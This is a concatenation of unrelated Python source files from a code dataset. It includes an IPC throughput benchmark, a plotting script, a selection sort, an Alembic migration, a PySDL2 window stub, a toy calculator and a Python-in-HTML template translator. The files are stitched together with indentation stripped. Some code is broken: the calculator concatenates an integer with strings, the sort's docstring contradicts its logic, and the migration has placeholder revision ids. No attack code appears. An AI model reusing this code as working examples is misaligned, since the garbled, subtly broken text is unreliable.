14:52:07,606.2 [26430]benchmark_manager# Overall benchmark result:
14:52:07,606.3 [26430]benchmark_manager# N: 32768
14:52:07,606.4 [26430]benchmark_manager# Read duration: 1.662+/-0.005 s
14:52:07,606.4 [26430]benchmark_manager# Average msg tx rate: 19711.600+/-65.113 msgs/s
14:52:07,606.5 [26430]benchmark_manager# Payload transfer rate: 1203.101+/-3.974 MB/s
# Small messages (length 1):
14:52:14,283.6 [26430]benchmark_manager# Overall benchmark result:
14:52:14,283.7 [26430]benchmark_manager# N: 131072
14:52:14,283.7 [26430]benchmark_manager# Read duration: 1.323+/-0.001 s
14:52:14,283.8 [26430]benchmark_manager# Average msg tx rate: 99096.931+/-73.556 msgs/s
14:52:14,283.9 [26430]benchmark_manager# Payload transfer rate: 0.095+/-0.000 MB/s
"""
import os
import sys
import logging
import time
import math
import gevent
sys.path.insert(0, os.path.abspath('..'))
import gipc
logging.basicConfig(
format='%(asctime)s,%(msecs)-6.1f [%(process)d]%(funcName)s# %(message)s',
datefmt='%H:%M:%S')
log = logging.getLogger()
log.setLevel(logging.INFO)
timer = time.time
if hasattr(time, 'perf_counter'):
timer = time.perf_counter
if sys.version_info[0] == 3:
xrange = range
def main():
repetitions = 3
msg = 'A' * 64000
log.info("Throughput benchmark")
log.info("Determining N ...")
benchmark_manager(msg, repetitions)
msg = "a"
log.info("Transmission benchmark")
log.info("Determining N ...")
benchmark_manager(msg, repetitions)
def benchmark_manager(msg, repetitions):
elapsed = 0
N = 1
    # Find N so that the benchmark lasts between one and two seconds
while elapsed < 1:
N *= 2
N, elapsed = benchmark(N, msg)
log.info("N = %s" % N)
log.info("Running %s benchmarks ..." % repetitions)
elapsed_values = []
# Repeat benchmark, save statistics
for _ in xrange(repetitions):
N, elapsed = benchmark(N, msg)
elapsed_values.append(elapsed)
# Evaluate stats of single run
mpertime = N/elapsed
datasize_mb = float(len(msg)*N)/1024/1024
datarate_mb = datasize_mb/elapsed
log.info(" Single benchmark result:")
log.info(" --> N: %s, MSG length: %s" % (N, len(msg)))
log.info(" --> Read duration: %.3f s" % elapsed)
log.info(" --> Average msg tx rate: %.3f msgs/s" % mpertime)
log.info(" --> Payload transfer rate: %.3f MB/s" % datarate_mb)
# Evaluate stats of all runs
e_mean = mean(elapsed_values)
e_err = pstdev(elapsed_values)/math.sqrt(len(elapsed_values)-1)
e_rel_err = e_err/e_mean
datarate_mb_mean = datasize_mb/e_mean
datarate_mb_err = datarate_mb_mean * e_rel_err
mpertime_mean = N/e_mean
mpertime_err = mpertime_mean * e_rel_err
log.info(" Overall benchmark result:")
log.info(" N: %s" % N)
log.info(" Read duration: %.3f+/-%.3f s" % (e_mean, e_err))
log.info(" Average msg tx rate: %.3f+/-%.3f msgs/s" %
(mpertime_mean, mpertime_err))
log.info(" Payload transfer rate: %.3f+/-%.3f MB/s" %
(datarate_mb_mean, datarate_mb_err))
def benchmark(N, msg):
result = None
with gipc.pipe() as (syncr, syncw):
with gipc.pipe() as (reader, writer):
p = gipc.start_process(
writer_process,
kwargs={
'writer': writer,
'syncr': syncr,
'N': N,
'msg': msg})
# Synchronize with child process
syncw.put("SYN")
assert reader.get() == "ACK"
t = timer()
while result != 'stop':
result = reader.get()
elapsed = timer() - t
p.join()
return N, elapsed
def writer_process(writer, syncr, N, msg):
with writer:
assert syncr.get() == "SYN"
writer.put("ACK")
for i in xrange(N):
writer.put(msg)
writer.put('stop')
# Credit: http://stackoverflow.com/a/27758326/145400
def mean(data):
"""Return the sample arithmetic mean of data."""
n = len(data)
if n < 1:
raise ValueError('mean requires at least one data point')
return sum(data)/float(n)
def _ss(data):
"""Return sum of square deviations of sequence data."""
c = mean(data)
ss = sum((x-c)**2 for x in data)
return ss
def pstdev(data):
"""Calculates the population standard deviation."""
n = len(data)
if n < 2:
raise ValueError('variance requires at least two data points')
ss = _ss(data)
pvar = ss/n # the population variance
return pvar**0.5
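# Illustrative sanity check for the two helpers above: mean([1.0, 2.0, 3.0])
# returns 2.0, and pstdev([1.0, 2.0, 3.0]) returns sqrt(2/3), roughly 0.8165.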
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
34622
|
<reponame>osagha/turktools<gh_stars>0
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from sympy import Symbol, solve
from sympy.abc import a, b, c
from fit_beta import fit_beta_mean_uncertainty, kl_dirichlet
RESULTS_FILE = "../results/results_beta_exp.csv"
FILTER_BY = "range"
results = pd.read_csv(RESULTS_FILE, header=0)
# Filter results by range
if "range" in FILTER_BY:
results = results[results.apply(lambda x: x["helpfulness_range"] < 0.75 and
x["prior_range"] < 0.75 and
x["posterior_range"] < 0.75, axis=1)]
if "upper_right" in FILTER_BY:
results = results[results.apply(lambda x: x["prior_mturk_july"] > 0.5 and
x["posterior_mturk_july"] > 0.5, axis=1)]
def map_certainty_to_variance(certainty):
"""
Let's just fit a line with these endpoints:
7 --> 0.001
1 --> 0.07 (the max possible value, when \alpha=\beta=1, is 0.08133333)
"""
return 0.0815 - (0.0115 * certainty)
def hyperbola_map(certainty, a, b, c):
variance = a / (certainty - c) + b
return variance
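# The hyperbola is pinned so that certainty 1 maps to variance 0.07 and
# certainty 7 maps to 0.001; the solve() call below picks a, b, c so the
# curve also passes through a chosen variance x at certainty 6.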
for x in np.arange(0.002, 0.07, 0.002):
params = solve([a/(1-c)+b-0.07, a/(7-c)+b-0.001, a/(6-c)+b-x])[0]
a_x, b_x, c_x = float(params[a]), float(params[b]), float(params[c])
for field in ["prior", "posterior"]:
results[field + f"_beta_{x}"] = results.apply(
lambda z: fit_beta_mean_uncertainty(z[field + "_mturk_july"],
hyperbola_map(z[field + "_certainty_july"], params[a], params[b], params[c])), axis=1)
results[f"kl_beta_{x}"] = results.apply(lambda z: kl_dirichlet(z[f"posterior_beta_{x}"], z[f"prior_beta_{x}"]), axis=1)
fig, axs = plt.subplots(1, 3, figsize=(11, 4))
g = sns.scatterplot(data=results, x="prior_mturk_july", y="posterior_mturk_july", hue="kl_july_and_mturk_probs_exp_10", ax=axs.flat[0], alpha=0.7, s=80)
g.legend_.set_title("KL")
g.title.set_text(f"Prior & Posterior vs. KL (exp)")
g.set_xlabel("Prior")
g.set_ylabel("Posterior")
g = sns.scatterplot(data=results, x="prior_mturk_july", y="posterior_mturk_july", hue="helpfulness_mean", ax=axs.flat[1], alpha=0.7, s=80)
g.legend_.set_title("Helpfulness")
g.title.set_text(f"Prior & Posterior vs. Helpfulness")
g.set_xlabel("Prior")
g.set_ylabel("")
g.set_yticklabels([])
g = sns.scatterplot(data=results, x="prior_mturk_july", y="posterior_mturk_july", hue=f"kl_beta_{x}", ax=axs.flat[2], alpha=0.7, s=80)
g.legend_.set_title("Beta KL")
g.title.set_text(f"Prior & Posterior vs. KL Beta (exp)")
g.set_xlabel("Prior")
g.set_ylabel("")
g.set_yticklabels([])
plt.subplots_adjust(left=0.05, right=0.95, wspace=0.1, )
plt.savefig(f"../figures/beta/scatter/prior_posterior_vs_helpfulness_kl_klbeta_{x}.png")
# fig.close()
# plt.savefig(f"../figures/beta/scatter/prior_posterior_vs_helpfulness_kl_klbeta_upper_right_unfiltered.png")
|
StarcoderdataPython
|
5142542
|
# selection sort
def selection(sortlist):
""" checks for the largest and then replaces - ascending order only"""
for i in range(0,len(sortlist)-1):
small = sortlist[i]
pos = i
for j in range(i+1,len(sortlist)):
if sortlist[j] < small:
small = sortlist[j]
pos = j
sortlist[pos] = sortlist[i]
        sortlist[i] = small
return sortlist
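# Example usage (illustrative sketch): sort a small sample list in place.
if __name__ == '__main__':
    sample = [29, 3, 14, 7, 1]
    print(selection(sample))  # -> [1, 3, 7, 14, 29]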
|
StarcoderdataPython
|
11354113
|
<reponame>SBRG/lifelike
"""Table schema for files.
Had to update the migration file itself, rather
than create a new migration file... The reason is
that the `id` column was changed to Integer,
and there wasn't an easy way to set a default
value to autoincrement the primary key of an
existing column with alembic.
The `file_id` column replaced the original
purpose of the `id` column.
Revision ID: 59b6851c654e
Revises: <PASSWORD>
Create Date: 2020-04-03 11:52:12.693738
"""
from alembic import context
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '59b<PASSWORD>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
'files',
sa.Column('id', sa.Integer(), nullable=False, autoincrement=True),
sa.Column('filename', sa.String(length=60), nullable=True),
sa.Column('file_id', sa.String(length=36), nullable=False),
sa.Column('raw_file', sa.LargeBinary(), nullable=False),
sa.Column('username', sa.String(length=30), nullable=True),
sa.Column('creation_date', sa.DateTime(), nullable=True),
sa.Column('annotations',
postgresql.JSONB(astext_type=sa.Text()),
server_default='[]',
nullable=False),
sa.PrimaryKeyConstraint('id', name=op.f('pk_files')),
sa.UniqueConstraint('file_id', name=op.f('uq_files_file_id')),
)
# ### end Alembic commands ###
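    # Data upgrades only run when requested via an Alembic "-x" argument,
    # e.g.: alembic -x data_migrate=true upgrade head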
if context.get_x_argument(as_dictionary=True).get('data_migrate', None):
data_upgrades()
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('files')
# ### end Alembic commands ###
# NOTE: In practice perfect downgrades are difficult and in some cases
# impossible! It is more practical to use database backups/snapshots to
# "downgrade" the database. Changes to the database that we intend to
# push to production should always be added to a NEW migration.
# (i.e. "downgrade forward"!)
def data_upgrades():
"""Add optional data upgrade migrations here"""
pass
def data_downgrades():
"""Add optional data downgrade migrations here"""
pass
|
StarcoderdataPython
|
1805904
|
import sys
import sdl2
import sdl2.ext
def run():
sdl2.ext.init()
window = sdl2.ext.Window("The Pong Game", size=(800, 600))
window.show()
factory = sdl2.ext.SpriteFactory(sdl2.ext.SOFTWARE)
spriterenderer = factory.create_sprite_render_system(window)
running = True
while running:
events = sdl2.ext.get_events()
for event in events:
if event.type == sdl2.SDL_QUIT:
running = False
break
window.refresh()
return 0
if __name__ == "__main__":
sys.exit(run())
|
StarcoderdataPython
|
180315
|
what = input( 'What do we do?' '(+, -, *, /, %): ' )
a = int ( input( 'enter number 1: ' ) )
b = int ( input( 'enter number 2 (a number, or a percentage of number "1"): ' ) )
p = 100
if what == '-':
c = a - b
print( str(a) + "-" + str(b) + "=" + str(c) )
elif what == '+':
c = a + b
print( str(a) + "+" + str(b) + "=" + str(c) )
if what == '*':
c = a * b
print( str(a) + "*" + str(b) + "=" + str(c) )
elif what == '/':
c = a / b
print( str(a) + "/" + str(b) + "=" + str(c) )
if what == '%':
c = b * p / a
print( str(b) + "*" + str(p) + "/" + str(a) + "=" + int(c) + "%")
|
StarcoderdataPython
|
1767593
|
#!/usr/bin/env python2
# Copyright (c) 2001 by The Regents of the University of California.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose, without fee, and without written agreement is
# hereby granted, provided that the above copyright notice and the following
# two paragraphs appear in all copies of this software.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT
# OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY OF
# CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS
# ON AN "AS IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
# Author: <NAME> <<EMAIL>>
"""
Pytec is a method to encode python scripts inside of
html documents. Due to the syntax of python, you are able
to define your own classes, methods and whatnot right in
the template file and have it work as expected.
The syntax for pytec is as follows. Inside your HTML document,
you can insert <%pytec ...python code here... %> to have
python code inside your document. Using print works as expected,
with the output going to the client in the http response.
Within the %pytec directive, you are expected to format your
code properly, as in python, whitespace is part of the grammar.
Thus, the first line must start in the first column. Note that
logic is not extended beyond the directive, so you cannot say
things like
<%pytec
if x > 0:
%>
<h1>X is greater than 0</h1>
<%pytec
else:
%>
<h1>X is less or equal to 0</h1>
You will have to wrap the HTML in print statements yourself.
Variables, however, do live beyond the directive. That is, you can
say:
<%pytec
my_var = 3
%>
<h1>some random text</h1>
<%pytec
print 'my_var = %s' % my_var
%>
Another directive is the <%= %> directive, which will evaluate the
statement therein and insert it into the html. This is good for
outputting individual variables like this:
<%pytec
my_tax_rate = .06
cost_of_shirt = 15
%>
<h1>The shirt will cost <%= cost_of_shirt * (1 + my_tax_rate) %></H1>
Last is the <%include %> directive. It expects a filename argument.
This file is interpreted as a pytec document, but plain html
will work. Also note that the program will recursively look for
include directives in the file, but avoids circular includes.
After you've written your pytec template, you run this program over
the file:
./pytec.py mytempl.pytec > mytempl.py
After this, you need to compile the python program output into java
bytecode. You use the jythonc command as follows:
jythonc -p seda.apps.Haboob.pytec -w ~/research/ mytempl.py
where the argument after -p is the package you want this class in, and
the argument after the -w is the root directory where this package
namespace lives.
The output will be a .class file usable by the Haboob web server.
<NAME> 8/15/1
<EMAIL>
"""
import re
import __builtin__
class TranslationError(Exception): pass
def read_page(filename, old_pages=None):
if not old_pages:
old_pages = []
include = re.compile('<%include (.*?)>')
old_pages.append(filename)
page = open(filename).read()
for file in include.findall(page):
if file not in old_pages:
page = re.sub('<%%include %s>' % file, read_page(file, old_pages), page)
else:
raise TranslationError, 'circular import'
return page
class TemplateTranslator:
# search strings
nondirective = re.compile('(.*?)<%', re.DOTALL)
directive = re.compile('(.*?)%>|(:)>', re.DOTALL)
non_whitespace = re.compile('\S')
whitespace = re.compile('^(\s*)')
colon = re.compile(':')
rest = re.compile('(.*$)', re.DOTALL)
include = re.compile('<%include (.*)>')
def __init__(self, filename):
self.filename = filename
self.page = read_page(filename)
# self.page = open(filename).read()
def translate(self):
curr = 0
source = []
while(1):
ordinary = self.nondirective.search(self.page, curr)
if not ordinary:
# no more directives
ordinary = self.rest.search(self.page, curr)
plaintext = ordinary.group(1).strip()
# print 'print """%s""",' % plaintext
source.append('print >> _pytec_out, """%s""",' % plaintext)
break # we're done
if self.non_whitespace.search(ordinary.group(1)):
plaintext = ordinary.group(1).strip()
# print 'print """%s""",' % plaintext
source.append('print >> _pytec_out, """%s""",' % plaintext)
curr = ordinary.end()
special = self.directive.search(self.page, curr)
if not special:
raise TranslationError
command = special.group(1)
if command.startswith('pytec'):
# this is a regular directive
# everything after the first \n
command = command[command.find('\n') + 1:]
lines = command.split('\n')
lines = map(
lambda x:re.sub('^(\s*)print\s*(?!>)', '\g<1>print >> _pytec_out, ', x),
lines
)
# print command
source.extend(lines)
elif command[0] == '!':
# this is a directive we have to place with the proper indent
command = command[1:].strip()
# print command
source.extend(command.split('\n'))
elif command[0] == '=':
# we print the result of this directive
# should we check to ensure that this is a single statement?
command = command[1:].strip()
# print 'print eval(r"""' + command + '"""),'
source.append('_pytec_out.softspace = 0')
source.append('print >> _pytec_out, eval(r"""' + command + '"""),')
source.append('_pytec_out.softspace = 0')
else:
print source
raise TranslationError
curr = special.end()
print 'from __future__ import nested_scopes'
print 'from seda.sandStorm.core import *'
print 'from seda.sandStorm.lib.http import *'
print 'from seda.apps.Haboob.hdapi import *'
#print 'from java.lang import *'
print 'import java'
print 'import StringIO'
print
print 'class %s(httpRequestHandlerIF):' % self.filename.split('.')[0]
print '\tdef handleRequest(self, req):'
print '\t\t_pytec_out = StringIO.StringIO()'
for line in source:
print '\t\t%s' % line
print '\t\toutstring = "".join(_pytec_out.buflist)'
print '\t\tresp = httpOKResponse("text/html", BufferElement(outstring))'
print '\t\treturn resp'
print
print 'def error(msg):'
print '\tresp = httpOKResponse("text/html", BufferElement(msg))'
print '\treturn resp'
if __name__ == '__main__':
import sys
    if len(sys.argv) < 2:
print "Must provide filename"
sys.exit()
tt = TemplateTranslator(sys.argv[1])
tt.translate()
|
StarcoderdataPython
|